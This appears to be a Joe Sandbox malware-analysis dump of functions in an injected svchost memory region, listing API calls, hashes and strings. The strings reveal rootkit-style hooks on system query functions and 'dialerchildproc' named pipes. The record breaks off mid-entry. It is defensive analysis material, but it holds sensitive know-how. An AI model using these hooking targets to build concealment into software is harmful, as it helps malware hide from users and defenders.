Source File: 0000000B.00000002.2970298836.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_26a879c0000_svchost.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction ID: 4a68258971deacf93967bbbabd61e0263a25abfb71767530d944726e65d9e7da
Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction Fuzzy Hash: 81314D72205B80DAEBA0DF61E8847ED7BA4F784744F44442ADB4E57B98EF39C648CB11

Function 0000026A879CB50C Relevance: 9.1, APIs: 6, Instructions: 83COMMON

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 0000026A879CB585
RtlLookupFunctionEntry.NTDLL ref: 0000026A879CB59D
RtlVirtualUnwind.NTDLL ref: 0000026A879CB5D8
IsDebuggerPresent.KERNEL32 ref: 0000026A879CB611
SetUnhandledExceptionFilter.KERNEL32 ref: 0000026A879CB61B
UnhandledExceptionFilter.KERNEL32 ref: 0000026A879CB626

Memory Dump Source

Source File: 0000000B.00000002.2970298836.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_26a879c0000_svchost.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction ID: c019a3b977e98c8464a9c7ca51686cb19ca29057d0f9f7fa7f0392543fb84b7f
Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction Fuzzy Hash: 7B318036214F8086EBA0CF25E84439E7BA4F788758F540116EB9D53BA8EF39C645CF01

Function 0000026A879CFEF8 Relevance: 7.8, APIs: 5, Instructions: 328fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 0000026A879CFF67
WriteFile.KERNEL32 ref: 0000026A879D021E
WriteFile.KERNEL32 ref: 0000026A879D0270
GetLastError.KERNEL32 ref: 0000026A879D0372
GetLastError.KERNEL32 ref: 0000026A879D03D2

Memory Dump Source

Source File: 0000000B.00000002.2970298836.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_26a879c0000_svchost.jbxd

Similarity

API ID: ErrorFileLastWrite$ConsoleOutput
String ID:
API String ID: 1443284424-0
Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction ID: e50ab53f46f43525feb9fc316cfef71cb17cf2ffafe6bbfab154a7f387decc61
Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction Fuzzy Hash: 2FE11132B04B809AE740CF68D5882DD7FB1F385788F148156DF5E67B99DA39C51ACB01

Function 0000026A879C12C8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120
memoryregistrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 0000026A879C1326
GetProcessHeap.KERNEL32 ref: 0000026A879C1334
HeapAlloc.KERNEL32 ref: 0000026A879C1345
RegEnumValueW.ADVAPI32 ref: 0000026A879C13A1

Part of subcall function 0000026A879C1554: StrCmpIW.SHLWAPI ref: 0000026A879C1585

GetProcessHeap.KERNEL32 ref: 0000026A879C13E9
HeapAlloc.KERNEL32 ref: 0000026A879C13F7
GetProcessHeap.KERNEL32 ref: 0000026A879C141B
HeapFree.KERNEL32 ref: 0000026A879C1429
lstrlenW.KERNEL32 ref: 0000026A879C1432
GetProcessHeap.KERNEL32 ref: 0000026A879C1440
HeapAlloc.KERNEL32 ref: 0000026A879C144E
StrCpyW.SHLWAPI ref: 0000026A879C1470
GetProcessHeap.KERNEL32 ref: 0000026A879C1485
HeapFree.KERNEL32 ref: 0000026A879C1493

Strings

d, xrefs: 0000026A879C1365

Memory Dump Source

Source File: 0000000B.00000002.2970298836.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_26a879c0000_svchost.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction ID: 450101e3417238312508fb76fbecef92d95677056d9534776bb621f83f8ed32d
Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction Fuzzy Hash: 645179B2204B85D3FB94CF62E54839EBBA1F788B81F048124DA8D17B14EF39C066CB41

Function 0000026A879C1EB4 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 0000026A879C1EBF

Part of subcall function 0000026A879C2174: GetModuleHandleA.KERNEL32 ref: 0000026A879C218C
Part of subcall function 0000026A879C2174: GetProcAddress.KERNEL32 ref: 0000026A879C219D

Part of subcall function 0000026A879C5C10: GetCurrentThreadId.KERNEL32 ref: 0000026A879C5C4B

Strings

NtQueryDirectoryFileEx, xrefs: 0000026A879C1F3C
advapi32.dll, xrefs: 0000026A879C1F97, 0000026A879C1FB8
NtEnumerateKey, xrefs: 0000026A879C1F59
ntdll.dll, xrefs: 0000026A879C1ECD
NtResumeThread, xrefs: 0000026A879C1F02
NtDeviceIoControlFile, xrefs: 0000026A879C1FF6
EnumServiceGroupW, xrefs: 0000026A879C1F90
NtEnumerateValueKey, xrefs: 0000026A879C1F76
EnumServicesStatusExW, xrefs: 0000026A879C1FB1, 0000026A879C1FD2
NtQuerySystemInformation, xrefs: 0000026A879C1EE5
NtQueryDirectoryFile, xrefs: 0000026A879C1F1F
sechost.dll, xrefs: 0000026A879C1FD9

Memory Dump Source

Source File: 0000000B.00000002.2970298836.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_26a879c0000_svchost.jbxd

Similarity

API ID: CurrentThread$AddressHandleModuleProc
String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
API String ID: 4175298099-1975688563
Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction ID: 8066ad8183acf5b913f5b97166315d822d90824d6080871f6ca517cb64a4b855
Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction Fuzzy Hash: DD31D274200A4AA4FF84EFA9EC597DC3F22F784744FC055239409331759E7ACA99DB92

Function 0000026A879C23F0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52
filethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessIdOfThread.KERNEL32 ref: 0000026A879C2405
GetCurrentProcessId.KERNEL32 ref: 0000026A879C240F

Part of subcall function 0000026A879C19AC: OpenProcess.KERNEL32 ref: 0000026A879C19CA
Part of subcall function 0000026A879C19AC: IsWow64Process.KERNEL32 ref: 0000026A879C19E0
Part of subcall function 0000026A879C19AC: CloseHandle.KERNEL32 ref: 0000026A879C19FB

CreateFileW.KERNEL32 ref: 0000026A879C2468
WriteFile.KERNEL32 ref: 0000026A879C2490
ReadFile.KERNEL32 ref: 0000026A879C24AF
CloseHandle.KERNEL32 ref: 0000026A879C24B8

Strings

\\.\pipe\dialerchildproc32, xrefs: 0000026A879C243F
\\.\pipe\dialerchildproc64, xrefs: 0000026A879C2438

Memory Dump Source

Source File: 0000000B.00000002.2970298836.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_26a879c0000_svchost.jbxd

Similarity

API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
API String ID: 2171963597-1373409510
Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction ID: 13b7611704c3c36f7f6880a0d3d83849d3e33de2f891407fa32e3e8a6b9eb749
Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction Fuzzy Hash: B0215736614A4083FB50CB25E40836E7FA1F389BA5F504215EA5D17AA8CF3EC189CF02

Function 0000026A879C104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97
memoryregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 0000026A879C10AB
RegEnumValueW.ADVAPI32 ref: 0000026A879C110E
GetProcessHeap.KERNEL32 ref: 0000026A879C1155
HeapAlloc.KERNEL32 ref: 0000026A879C1163
GetProcessHeap.KERNEL32 ref: 0000026A879C1187
HeapFree.KERNEL32 ref: 0000026A879C1195

Strings

d, xrefs: 0000026A879C10CE

Memory Dump Source

Source File: 0000000B.00000002.2970298836.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_26a879c0000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction ID: 5301be5536c62eb723cdb2ab7e8a703766583fcf04a52a5b40df69596fb488ec
Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction Fuzzy Hash: A4418073214B80D7EBA0CF62E44879EBBA1F389B85F008125DB8917B54EF39D165CB04

Function 0000026A879969F0 Relevance: 12.2, APIs: 8, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 0000026A87996A18
__scrt_acquire_startup_lock.LIBCMT ref: 0000026A87996A6A
_RTC_Initialize.LIBCMT ref: 0000026A87996A98
__scrt_dllmain_after_initialize_c.LIBCMT ref: 0000026A87996ABE
__scrt_release_startup_lock.LIBCMT ref: 0000026A87996AE9

Memory Dump Source

Source File: 0000000B.00000002.2969236862.0000026A87990000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A87990000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_26a87990000_svchost.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction ID: d9f4358a1d31489f216a376bbd794669f2cb2f33805e6d499db2f45a2d4a1307
Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction Fuzzy Hash: 2781F73170524186FBD0AB69984D79D72E0E797780F184025AA0977796EF3BC9868F03

Function 0000026A879C75F0 Relevance: 12.2, APIs: 8, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 0000026A879C7618
__scrt_acquire_startup_lock.LIBCMT ref: 0000026A879C766A
_RTC_Initialize.LIBCMT ref: 0000026A879C7698
__scrt_dllmain_after_initialize_c.LIBCMT ref: 0000026A879C76BE
__scrt_release_startup_lock.LIBCMT ref: 0000026A879C76E9

Memory Dump Source

Source File: 0000000B.00000002.2970298836.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_26a879c0000_svchost.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction ID: e6e00d3cec3b77a6a90c9ec39f0c43c6408aef7a54a59689b67cb6274e0b0fd7
Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction Fuzzy Hash: FB81D13170464586FFD0EB2A998D39D7A94ABD5B80F4C8425AA0877796DB3BC8418F13

Function 0000026A879C9804 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32 ref: 0000026A879C9889
GetLastError.KERNEL32 ref: 0000026A879C9897
LoadLibraryExW.KERNEL32 ref: 0000026A879C98C1
FreeLibrary.KERNEL32 ref: 0000026A879C9907
GetProcAddress.KERNEL32 ref: 0000026A879C9913

Strings

api-ms-, xrefs: 0000026A879C98A9

Memory Dump Source

Source File: 0000000B.00000002.2970298836.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_26a879c0000_svchost.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction ID: 46faaff618465698a6995b51eff2aa39a1bd3dd032481dc3d2b297d9d9beb68c
Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction Fuzzy Hash: CF31C131212A40D1FF92DB06E80879D77A8BB98BB4F5A4524ED2D2B394DF39C445CB02

Function 0000026A879D1B9C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteConsoleW.KERNEL32 ref: 0000026A879D1BCD
GetLastError.KERNEL32 ref: 0000026A879D1BD9
CloseHandle.KERNEL32 ref: 0000026A879D1BF1
CreateFileW.KERNEL32 ref: 0000026A879D1C1C
WriteConsoleW.KERNEL32 ref: 0000026A879D1C3B

Strings

CONOUT$, xrefs: 0000026A879D1BFD

Memory Dump Source

Source File: 0000000B.00000002.2970298836.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_26a879c0000_svchost.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction ID: 195ee54b184dfd1d4a94bbabb291892d4747d69da2f14ea1dda46ef7d3bb7c40
Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction Fuzzy Hash: E211BC32314B4086F790CB12E84831DBEA4F789FE5F004225EA5D977A4DF3AC9048B41

Function 0000026A879C5C10 Relevance: 9.2, APIs: 6, Instructions: 240
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 0000026A879C5C4B
GetThreadContext.KERNEL32 ref: 0000026A879C5DB5

Part of subcall function 0000026A879C5A40: GetCurrentThreadId.KERNEL32 ref: 0000026A879C5A44

Memory Dump Source

Source File: 0000000B.00000002.2970298836.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_26a879c0000_svchost.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
Instruction ID: 668ed7f2667091ced11d858c5786cb119bf8f80e5a5e4a6a64a44aaa3e9ecd61
Opcode Fuzzy Hash: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
Instruction Fuzzy Hash: 50D18C76208B8881EAB0DB1AE49435E7BB4F3D8B84F154216EA8D57BA5DF39C541CF01

Function 0000026A879C30B4 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000026A879C30D7
HeapAlloc.KERNEL32 ref: 0000026A879C30EA
StrCmpNIW.SHLWAPI ref: 0000026A879C316B
GetProcessHeap.KERNEL32 ref: 0000026A879C31D1
HeapFree.KERNEL32 ref: 0000026A879C31DF

Strings

dialer, xrefs: 0000026A879C3164

Memory Dump Source

Source File: 0000000B.00000002.2970298836.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_26a879c0000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: dialer
API String ID: 756756679-3528709123
Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction ID: 4e4df6a00d47054bd9678bac00e72608e7238581d895763a19b039f4903db13a
Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction Fuzzy Hash: DA31A231701B519AFF95DF16A84826D7BA0FB84B94F0881209F8C27B55EF3AC4A1CB02

Function 0000026A879C1A14 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 0000026A879C1A3A
K32GetModuleFileNameExW.KERNEL32 ref: 0000026A879C1A58
PathFindFileNameW.SHLWAPI ref: 0000026A879C1A67
lstrlenW.KERNEL32 ref: 0000026A879C1A73
StrCpyW.SHLWAPI ref: 0000026A879C1A86
CloseHandle.KERNEL32 ref: 0000026A879C1A94

Memory Dump Source

Source File: 0000000B.00000002.2970298836.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_26a879c0000_svchost.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction ID: fa2f4e6e1173dce71ba7fbc21c8ec9abc64c048dfb6ec85f973e965938c3ec86
Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction Fuzzy Hash: B4016971300A4196FB90DB12A85C35D7BA1F788FC1F888035CE8D53B54DE3EC9898B41

Function 0000026A879C37AC Relevance: 9.0, APIs: 6, Instructions: 39threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 0000026A879C37C8
GetCurrentProcess.KERNEL32 ref: 0000026A879C37D6
VirtualProtectEx.KERNEL32 ref: 0000026A879C37F8
GetCurrentProcess.KERNEL32 ref: 0000026A879C3819
VirtualProtectEx.KERNEL32 ref: 0000026A879C383A
TerminateThread.KERNEL32 ref: 0000026A879C3849

Memory Dump Source

Source File: 0000000B.00000002.2970298836.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_26a879c0000_svchost.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction ID: 88e1dc055e24f007908cfd903687df20f7c2d2507063046347e7f2aeeb900160
Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction Fuzzy Hash: A5111775611B41C2FBA4DB65E81D75E7EB0BB88B82F040429CA4D27764EF3EC4088B02

Function 0000026A879C90F5 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000026A879C9103
_IsNonwritableInCurrentImage.LIBCMT ref: 0000026A879C9198
RtlUnwindEx.NTDLL ref: 0000026A879C91E7

Strings

csm, xrefs: 0000026A879C917E
f, xrefs: 0000026A879C9116

Memory Dump Source

Source File: 0000000B.00000002.2970298836.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_26a879c0000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction ID: 6ab0d891425302b41ef9979ff86cf2d6f11ac9e1349dcf3938e42dc16432e1c0
Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction Fuzzy Hash: 8A51BD32311640CAEF94CF25E44CB5D3BA5F3A4BA8F528120DE4A67788EB37D941CB02

Function 0000026A879C90D8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 0000026A879C9103
_IsNonwritableInCurrentImage.LIBCMT ref: 0000026A879C9198
RtlUnwindEx.NTDLL ref: 0000026A879C91E7

Strings

csm, xrefs: 0000026A879C917E
f, xrefs: 0000026A879C9116

Memory Dump Source

Source File: 0000000B.00000002.2970298836.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_26a879c0000_svchost.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction ID: cb143f3d6994fee4eb32646ee3a4132a5777a16b8d7ef106b84b70684e1f550f
Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction Fuzzy Hash: 1531C032210680DAEB94DF11E84C71D3BA5F794BA8F058114AE4A27785DB3AD941CB06

Function 0000026A879C1AB8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 0000026A879C1AD8
StrCmpNIW.SHLWAPI ref: 0000026A879C1AF2
lstrlenW.KERNEL32 ref: 0000026A879C1B01
StrCpyW.SHLWAPI ref: 0000026A879C1B16

Strings

\\?\, xrefs: 0000026A879C1AE6

Memory Dump Source

Source File: 0000000B.00000002.2970298836.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_26a879c0000_svchost.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction ID: 8ba78bf88c1916c61f564416cb90b9acd9514bc905b3ba5d15dab470fb65a13c
Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction Fuzzy Hash: 5BF03C7230464196FBA0CB21F99835D7F61F784B99F848020CA4D57959EE6EC688CF01

Function 0000026A879C3200 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI ref: 0000026A879C3222
StrCpyW.SHLWAPI ref: 0000026A879C3232
StrCatW.SHLWAPI ref: 0000026A879C323E
PathCombineW.SHLWAPI ref: 0000026A879C324C

Strings

\\.\pipe\, xrefs: 0000026A879C3218

Memory Dump Source

Source File: 0000000B.00000002.2970298836.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_26a879c0000_svchost.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction ID: adf10e1541d886bfc46832840359db2901279f5cca05dbc69dded0e73e1861d5
Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction Fuzzy Hash: 7FF08230704B80D2FE80CB13B90811DBE21EB88FD1F088131DE5E27B28DE2DC4418B02

Function 0000026A879CA138 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 0000026A879CA154
GetProcAddress.KERNEL32 ref: 0000026A879CA16A
FreeLibrary.KERNEL32 ref: 0000026A879CA187

Strings

CorExitProcess, xrefs: 0000026A879CA163
mscoree.dll, xrefs: 0000026A879CA14B

Memory Dump Source

Source File: 0000000B.00000002.2970298836.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_26a879c0000_svchost.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction ID: 0ba0d654cb6f18296789ccbe063357a8a2b3fcf1d8cae2d0dced513f39d16d73
Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction Fuzzy Hash: A6F0FE7132164492FFD4CF60E89836D3F60EB88B91F442019994FA7574DE29C488CF12

Function 0000026A879C51B0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0000026A879C5236

Memory Dump Source

Source File: 0000000B.00000002.2970298836.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_26a879c0000_svchost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
Instruction ID: b5e59098baef328b6d7bdbe74c7cb822dd7390226da7e9ac6dd182fe16b175d4
Opcode Fuzzy Hash: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
Instruction Fuzzy Hash: D402BA36219B80C6EBA0CB55E49435EBBA0F3D4794F205116EA8E97BA9DF7DC484CF01

Function 0000026A879D0860 Relevance: 7.7, APIs: 5, Instructions: 202COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 0000026A879D08A2
GetConsoleMode.KERNEL32 ref: 0000026A879D0960
GetLastError.KERNEL32 ref: 0000026A879D09EA

Memory Dump Source

Source File: 0000000B.00000002.2970298836.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_26a879c0000_svchost.jbxd

Similarity

API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
String ID:
API String ID: 2210144848-0
Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction ID: 46f073674741d853182dd06e49b026107be083b4c17cd02207308e0e43a20ad0
Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction Fuzzy Hash: EB81C032B1065089FBD0DB69D94C3AD3FA1F784B98F444156DE1A77792DB36C441CB22

Function 0000026A879C57F0 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0000026A879C5806

Memory Dump Source

Source File: 0000000B.00000002.2970298836.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_26a879c0000_svchost.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
Instruction ID: d90cda66bbfad1debd14c78d4e1d40b92ccf3fbe301fd6ccc73bba502c12dda2
